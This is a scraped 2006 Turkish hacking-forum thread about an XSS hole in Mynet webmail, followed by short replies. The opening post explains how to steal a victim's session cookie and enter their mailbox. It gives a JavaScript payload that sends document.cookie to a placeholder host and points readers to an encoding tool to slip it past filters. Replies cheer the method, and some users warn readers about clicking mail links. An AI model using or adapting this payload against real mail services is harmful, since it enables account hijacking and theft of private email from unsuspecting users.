folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Mynet Maillerde Xss Açığı...



Mynet Maillerde Xss Açığı...

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fistandantilus
    Fistandantilus's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek
    mynet mailde html olarak taglarının çalışmasına izin verior buda başına çok güzel sonuçlar doğuruyor. Bu sayede karşıdakinin cookie'sini çalar ve proxy ile onun mail kutusuna girebilirsiniz. <br><br>ancak charcode etmeniz gerekiyor encodesuzu yemiyor.<br><br>http://www.paulschou.com/tools/xlate/<br>buradan komutunuzu charcodelıyabilirsiniz.<br><br>Örnek kod:<br><br>i=new/**/Image();i.src='http://örneksite.com/fistandantilus/f.gif?'+document.cookie<br><br>bu kodu kendinize göre düzenleyin ve encode'layın.<br><br>-Alıntıdan yorumlanmıştır- <div class="hide-for-small"> <hr /><span style="font-size:small" >Fakat s&#246;yleyin kardeşlerim; insanlığın bir ereği eksikse, eksik değil midir- bizzat kendisi de?</span> </div> </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quoteFolder=30885" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> <li class="ForumMessage"> <div class="posthead"> <a id="msg247627"></a> <span class="postdate"> <time datetime="2006-08-06 12:41:00">06/Ağu/06 12:41</time> </span> <span class="postHeadRight hide-on-print"> <a class="icontext" onclick="prompt('Mesajın Kısayolu', 'https://www.tahribat.com/forum/mynet-maillerde-xss-acigi-30885#msg247627');" href="javascript:void(0)"><img src="/img/icon/misc/link2.png" alt="Kısayol" />Kısayol</a> <a href="#" data-tid="2" data-fid="247627" class="reportAsset icontext"><img src="/img/icon/misc/report.png" alt="report" />Şikayet</a> <a class="icontext" href="/PM?to=ertan"><img src="/img/icon/misc/message-unread.png" alt="pm" />Özel Mesaj</a> </span> </div> <div class="postMain"> <div class="postPanel"> <a href="/Members/ertan" >ertan</a> <br /> <img class="avatar" src="/img/Avatar/FuckYou.jpg" alt="ertan's avatar" /> <br /> <div class="hideSm"> Kayıt Tarihi: 21/Temmuz/2005 <br /> <img src="/img/icon/misc/male.png" alt="Erkek" /> </div> </div> <div class="PostCanvas"> <div class="postarrow"></div> <div class="PostContent"> güzel valla hoca :) işe yarar a.q. yahoo da var, hotmail de var gmail de bilmiyorum mynette de var iyi iyi :) <div class="hide-for-small"> <hr /><span style="font-size:small" >Bundan sonra sadece insan olanlarla muhattap olacağım.. Ona g&#246;re karşıma gelin...</span> </div> </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quote=247627" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> <li class="ForumMessage"> <div class="posthead"> <a id="msg247629"></a> <span class="postdate"> <time datetime="2006-08-06 12:42:00">06/Ağu/06 12:42</time> </span> <span class="postHeadRight hide-on-print"> <a class="icontext" onclick="prompt('Mesajın Kısayolu', 'https://www.tahribat.com/forum/mynet-maillerde-xss-acigi-30885#msg247629');" href="javascript:void(0)"><img src="/img/icon/misc/link2.png" alt="Kısayol" />Kısayol</a> <a href="#" data-tid="2" data-fid="247629" class="reportAsset icontext"><img src="/img/icon/misc/report.png" alt="report" />Şikayet</a> <a class="icontext" href="/PM?to=kozanaybar"><img src="/img/icon/misc/message-unread.png" alt="pm" />Özel Mesaj</a> </span> </div> <div class="postMain"> <div class="postPanel"> <a href="/Members/kozanaybar" >kozanaybar</a> <br /> <img class="avatar" src="/img/Avatar/BeyazKarizmatikAmca.jpg" alt="kozanaybar's avatar" /> <br /> <div class="hideSm"> Kayıt Tarihi: 11/Kasım/2005 <br /> <img src="/img/icon/misc/homo.png" alt="Homo" /> </div> </div> <div class="PostCanvas"> <div class="postarrow"></div> <div class="PostContent"> Hekkaten güzel,denerim kendi mailimde ama zaten mynetin heryeri xss yiyo. Hotmailde de bulmak lasım onsuz olmuyor :P </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quote=247629" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> <li class="ForumMessage"> <div class="posthead"> <a id="msg247632"></a> <span class="postdate"> <time datetime="2006-08-06 12:45:00">06/Ağu/06 12:45</time> </span> <span class="postHeadRight hide-on-print"> <a class="icontext" onclick="prompt('Mesajın Kısayolu', 'https://www.tahribat.com/forum/mynet-maillerde-xss-acigi-30885#msg247632');" href="javascript:void(0)"><img src="/img/icon/misc/link2.png" alt="Kısayol" />Kısayol</a> <a href="#" data-tid="2" data-fid="247632" class="reportAsset icontext"><img src="/img/icon/misc/report.png" alt="report" />Şikayet</a> <a class="icontext" href="/PM?to=Fistandantilus"><img src="/img/icon/misc/message-unread.png" alt="pm" />Özel Mesaj</a> </span> </div> <div class="postMain"> <div class="postPanel"> <a href="/Members/Fistandantilus" >Fistandantilus</a> <br /> <img class="avatar" src="/img/Avatar/Tahribatci.jpg" alt="Fistandantilus's avatar" /> <br /> <div class="hideSm"> Kayıt Tarihi: 28/Eyl&#252;l/2004 <br /> <img src="/img/icon/misc/male.png" alt="Erkek" /> </div> </div> <div class="PostCanvas"> <div class="postarrow"></div> <div class="PostContent"> Hotmaildede varda onu paylaşmak açığın kapanmasına sebebiyet verir :) <div class="hide-for-small"> <hr /><span style="font-size:small" >Fakat s&#246;yleyin kardeşlerim; insanlığın bir ereği eksikse, eksik değil midir- bizzat kendisi de?</span> </div> </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quote=247632" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> <li class="ForumMessage"> <div class="posthead"> <a id="msg247634"></a> <span class="postdate"> <time datetime="2006-08-06 12:46:00">06/Ağu/06 12:46</time> </span> <span class="postHeadRight hide-on-print"> <a class="icontext" onclick="prompt('Mesajın Kısayolu', 'https://www.tahribat.com/forum/mynet-maillerde-xss-acigi-30885#msg247634');" href="javascript:void(0)"><img src="/img/icon/misc/link2.png" alt="Kısayol" />Kısayol</a> <a href="#" data-tid="2" data-fid="247634" class="reportAsset icontext"><img src="/img/icon/misc/report.png" alt="report" />Şikayet</a> <a class="icontext" href="/PM?to=Kelv1n"><img src="/img/icon/misc/message-unread.png" alt="pm" />Özel Mesaj</a> </span> </div> <div class="postMain"> <div class="postPanel"> <a href="/Members/Kelv1n" >Kelv1n</a> <br /> <img class="avatar" src="/img/Avatar/WalterBishop.jpg" alt="Kelv1n's avatar" /> <br /> <div class="hideSm"> Kayıt Tarihi: 02/Eyl&#252;l/2005 <br /> <img src="/img/icon/misc/male.png" alt="Erkek" /> </div> </div> <div class="PostCanvas"> <div class="postarrow"></div> <div class="PostContent"> pw diye birşey var ;) <div class="hide-for-small"> <hr /><span style="font-size:small" >Hatalıysam..... aramızda kalsın ;)</span> </div> </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quote=247634" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> <li class="ForumMessage"> <div class="posthead"> <a id="msg247636"></a> <span class="postdate"> <time datetime="2006-08-06 12:49:00">06/Ağu/06 12:49</time> </span> <span class="postHeadRight hide-on-print"> <a class="icontext" onclick="prompt('Mesajın Kısayolu', 'https://www.tahribat.com/forum/mynet-maillerde-xss-acigi-30885#msg247636');" href="javascript:void(0)"><img src="/img/icon/misc/link2.png" alt="Kısayol" />Kısayol</a> <a href="#" data-tid="2" data-fid="247636" class="reportAsset icontext"><img src="/img/icon/misc/report.png" alt="report" />Şikayet</a> <a class="icontext" href="/PM?to=ertan"><img src="/img/icon/misc/message-unread.png" alt="pm" />Özel Mesaj</a> </span> </div> <div class="postMain"> <div class="postPanel"> <a href="/Members/ertan" >ertan</a> <br /> <img class="avatar" src="/img/Avatar/FuckYou.jpg" alt="ertan's avatar" /> <br /> <div class="hideSm"> Kayıt Tarihi: 21/Temmuz/2005 <br /> <img src="/img/icon/misc/male.png" alt="Erkek" /> </div> </div> <div class="PostCanvas"> <div class="postarrow"></div> <div class="PostContent"> hazır konu açılmışken bir uyarı yapayım :)<br/><br/>bakın bu xss açığı yayılıyor sakın yutmayın, maillerde gelen linklere tıklamak yerine o linki kopyalayıp adres çubuğuna yapıştırın ve ordan açın.. Sonra mailim hacklendi diye ağlamayın a.q. 2-3 kez yazdım bunla ilgili şeyler millet takmıyor, sonra da nasıl yaptılar diye çene çalıyorlar...Uyanık olun biraz <div class="hide-for-small"> <hr /><span style="font-size:small" >Bundan sonra sadece insan olanlarla muhattap olacağım.. Ona g&#246;re karşıma gelin...</span> </div> </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quote=247636" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> <li class="ForumMessage"> <div class="posthead"> <a id="msg247637"></a> <span class="postdate"> <time datetime="2006-08-06 12:51:00">06/Ağu/06 12:51</time> </span> <span class="postHeadRight hide-on-print"> <a class="icontext" onclick="prompt('Mesajın Kısayolu', 'https://www.tahribat.com/forum/mynet-maillerde-xss-acigi-30885#msg247637');" href="javascript:void(0)"><img src="/img/icon/misc/link2.png" alt="Kısayol" />Kısayol</a> <a href="#" data-tid="2" data-fid="247637" class="reportAsset icontext"><img src="/img/icon/misc/report.png" alt="report" />Şikayet</a> <a class="icontext" href="/PM?to=GolgeleR"><img src="/img/icon/misc/message-unread.png" alt="pm" />Özel Mesaj</a> </span> </div> <div class="postMain"> <div class="postPanel"> <a href="/Members/GolgeleR" >GolgeleR</a> <br /> <img class="avatar" src="/img/Avatar/TbtSpecialForces.jpg" alt="GolgeleR's avatar" /> <br /> <div class="hideSm"> Kayıt Tarihi: 01/Ekim/2005 <br /> <img src="/img/icon/misc/male.png" alt="Erkek" /> </div> </div> <div class="PostCanvas"> <div class="postarrow"></div> <div class="PostContent"> edit ( ertan cok doğru söylüyor..! ) <div class="hide-for-small"> <hr /><span style="font-size:small" >BAN</span> </div> </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quote=247637" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> <li class="ForumMessage"> <div class="posthead"> <a id="msg247639"></a> <span class="postdate"> <time datetime="2006-08-06 12:56:00">06/Ağu/06 12:56</time> </span> <span class="postHeadRight hide-on-print"> <a class="icontext" onclick="prompt('Mesajın Kısayolu', 'https://www.tahribat.com/forum/mynet-maillerde-xss-acigi-30885#msg247639');" href="javascript:void(0)"><img src="/img/icon/misc/link2.png" alt="Kısayol" />Kısayol</a> <a href="#" data-tid="2" data-fid="247639" class="reportAsset icontext"><img src="/img/icon/misc/report.png" alt="report" />Şikayet</a> <a class="icontext" href="/PM?to=exploit25"><img src="/img/icon/misc/message-unread.png" alt="pm" />Özel Mesaj</a> </span> </div> <div class="postMain"> <div class="postPanel"> <a href="/Members/exploit25" >exploit25</a> <br /> <img class="avatar" src="/img/Avatar/TbtSpecialForces.jpg" alt="exploit25's avatar" /> <br /> <div class="hideSm"> Kayıt Tarihi: 03/Ocak/2006 <br /> <img src="/img/icon/misc/male.png" alt="Erkek" /> </div> </div> <div class="PostCanvas"> <div class="postarrow"></div> <div class="PostContent"> GolgeleR sana pm attım bi bakıcan mı <div class="hide-for-small"> <hr /><span style="font-size:small" >Selamet dilimizde g&#252;ller hep nickimizde biz gideriz cennete hey cennete By rene</span> </div> </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quote=247639" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> <li class="ForumMessage"> <div class="posthead"> <a id="msg247641"></a> <span class="postdate"> <time datetime="2006-08-06 12:57:00">06/Ağu/06 12:57</time> </span> <span class="postHeadRight hide-on-print"> <a class="icontext" onclick="prompt('Mesajın Kısayolu', 'https://www.tahribat.com/forum/mynet-maillerde-xss-acigi-30885#msg247641');" href="javascript:void(0)"><img src="/img/icon/misc/link2.png" alt="Kısayol" />Kısayol</a> <a href="#" data-tid="2" data-fid="247641" class="reportAsset icontext"><img src="/img/icon/misc/report.png" alt="report" />Şikayet</a> <a class="icontext" href="/PM?to=YaRaMaZ"><img src="/img/icon/misc/message-unread.png" alt="pm" />Özel Mesaj</a> </span> </div> <div class="postMain"> <div class="postPanel"> <a href="/Members/YaRaMaZ" >YaRaMaZ</a> <br /> <img class="avatar" src="/img/Avatar/TuxMesaleli.jpg" alt="YaRaMaZ's avatar" /> <br /> <div class="hideSm"> Kayıt Tarihi: 12/Temmuz/2006 <br /> <img src="/img/icon/misc/male.png" alt="Erkek" /> </div> </div> <div class="PostCanvas"> <div class="postarrow"></div> <div class="PostContent"> :Daynen <div class="hide-for-small"> <hr /><span style="font-size:small" >the one and only yaramaz.</span> </div> </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quote=247641" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> <li class="ForumMessage"> <div class="posthead"> <a id="msg247645"></a> <span class="postdate"> <time datetime="2006-08-06 13:08:00">06/Ağu/06 13:08</time> </span> <span class="postHeadRight hide-on-print"> <a class="icontext" onclick="prompt('Mesajın Kısayolu', 'https://www.tahribat.com/forum/mynet-maillerde-xss-acigi-30885#msg247645');" href="javascript:void(0)"><img src="/img/icon/misc/link2.png" alt="Kısayol" />Kısayol</a> <a href="#" data-tid="2" data-fid="247645" class="reportAsset icontext"><img src="/img/icon/misc/report.png" alt="report" />Şikayet</a> <a class="icontext" href="/PM?to=ertan"><img src="/img/icon/misc/message-unread.png" alt="pm" />Özel Mesaj</a> </span> </div> <div class="postMain"> <div class="postPanel"> <a href="/Members/ertan" >ertan</a> <br /> <img class="avatar" src="/img/Avatar/FuckYou.jpg" alt="ertan's avatar" /> <br /> <div class="hideSm"> Kayıt Tarihi: 21/Temmuz/2005 <br /> <img src="/img/icon/misc/male.png" alt="Erkek" /> </div> </div> <div class="PostCanvas"> <div class="postarrow"></div> <div class="PostContent"> arkadşalar GolgeleR i sıkıştırmayın, söyledim ona vermeyecek kimseye... Bu yöntemin yayılması hem bu açığın kapanmasına hemde masum insaların canının yanmasına sebebiyet verecektir.. <div class="hide-for-small"> <hr /><span style="font-size:small" >Bundan sonra sadece insan olanlarla muhattap olacağım.. Ona g&#246;re karşıma gelin...</span> </div> </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quote=247645" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> <li class="ForumMessage"> <div class="posthead"> <a id="msg247685"></a> <span class="postdate"> <time datetime="2006-08-06 13:37:00">06/Ağu/06 13:37</time> </span> <span class="postHeadRight hide-on-print"> <a class="icontext" onclick="prompt('Mesajın Kısayolu', 'https://www.tahribat.com/forum/mynet-maillerde-xss-acigi-30885#msg247685');" href="javascript:void(0)"><img src="/img/icon/misc/link2.png" alt="Kısayol" />Kısayol</a> <a href="#" data-tid="2" data-fid="247685" class="reportAsset icontext"><img src="/img/icon/misc/report.png" alt="report" />Şikayet</a> <a class="icontext" href="/PM?to=exploit25"><img src="/img/icon/misc/message-unread.png" alt="pm" />Özel Mesaj</a> </span> </div> <div class="postMain"> <div class="postPanel"> <a href="/Members/exploit25" >exploit25</a> <br /> <img class="avatar" src="/img/Avatar/TbtSpecialForces.jpg" alt="exploit25's avatar" /> <br /> <div class="hideSm"> Kayıt Tarihi: 03/Ocak/2006 <br /> <img src="/img/icon/misc/male.png" alt="Erkek" /> </div> </div> <div class="PostCanvas"> <div class="postarrow"></div> <div class="PostContent"> Fistandantilus sana da pm attım o zaan :) <div class="hide-for-small"> <hr /><span style="font-size:small" >Selamet dilimizde g&#252;ller hep nickimizde biz gideriz cennete hey cennete By rene</span> </div> </div> </div> </div> <div class="postfoot"> <div class="postFootRight hide-on-print"> <a class="aquote" href="/Forum/NewMessage?FolderId=30885&amp;quote=247685" rel="nofollow" title="Alıntı yap"> <img alt="Reply With Quote" src="/img/icon/misc/quote.png" title="Alıntı yap"> Alıntı yap </a> </div> </div> <div class="clear"></div> </li> </ol> <div id="topicinfo"> Toplam Hit: <b>12877</b> Toplam Mesaj: <b>11</b><br /> <br /> </div> <script type="text/javascript" src="/Scripts/tbt/FormatContent.js"></script> <script type="text/javascript"> var token = ''; var TopFolderRoute = '/forum/mevzu-bilisim-guvenligi-86'; var TopicSlug = 'mynet-maillerde-xss-acigi'; function ResimBoyutlandir() { for (i = 0; i < document.getElementsByTagName('img').length; i++) { im = document.getElementsByTagName('img')[i]; if (im.width > 700) { a = im.width; b = im.height; im.width = '700'; im.height = b / (a / 700); im.className = 'ForumResimGaleri'; //eval("pop" + String(i) + " = new Function(\"pop = window.open('" + im.src + " ','fullscale','scrollbars=1,resizable=1'); pop.focus();\")"); //eval("im.onclick = pop" + String(i) + ";"); if (document.all) im.style.cursor = 'hand'; if (!document.all) im.style.cursor = 'pointer'; im.title = ''; } else if (im.width > 200 && im.src.indexOf('navbar') < 0) { if (document.all) im.style.cursor = 'hand'; if (!document.all) im.style.cursor = 'pointer'; im.title = ''; im.className = 'ForumResimGaleri'; } } } ResimBoyutlandir(); </script> <div id="PageFoot"> <div class="left"> <a class="button blue2 icontext " id="cevapla" href="/Forum/NewMessage?FolderId=30885"> <img src="/img/icon/Folder/reply.png" alt="Reply to topic" style="vertical-align:middle" />Cevapla</a> </div> <div id="underdoc" > </div> </div> <div class="clear"></div> </main> </div> <footer> <div class="FooterRow content-wrapper"> <div class="Copyright left"> &copy; Copyright Tahribat.com All Rights Reserved. </div> <div class="right hide-on-print"> <ul class="link-list"> <li><a href="/Static/GizlilikIlkeleri" class="hide-for-small">Gizlilik İlkeleri</a></li> <li><a href="/Static/KullanimKosullari" class="hide-for-small">Kullanım Koşulları</a></li> <li><a href="/Static/About">Hakkımızda</a></li> <li><a href="/Contact">İletişim</a></li> </ul> </div> </div><div class="clear"></div> </footer> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-LLYMQZ6LD4"></script> <script> window.dataLayer = window.dataLayer || []; function gtag() { dataLayer.push(arguments); } gtag('js', new Date()); gtag('config', 'G-LLYMQZ6LD4'); </script> <script> var loadDeferredStyles = function () { var addStylesNode = document.getElementById("deferred-styles"); var replacement = document.createElement("div"); replacement.innerHTML = addStylesNode.textContent; document.body.appendChild(replacement) addStylesNode.parentElement.removeChild(addStylesNode); }; var raf = requestAnimationFrame || mozRequestAnimationFrame || webkitRequestAnimationFrame || msRequestAnimationFrame; if (raf) raf(function () { window.setTimeout(loadDeferredStyles, 0); }); else window.addEventListener('load', loadDeferredStyles); </script> </body> </html>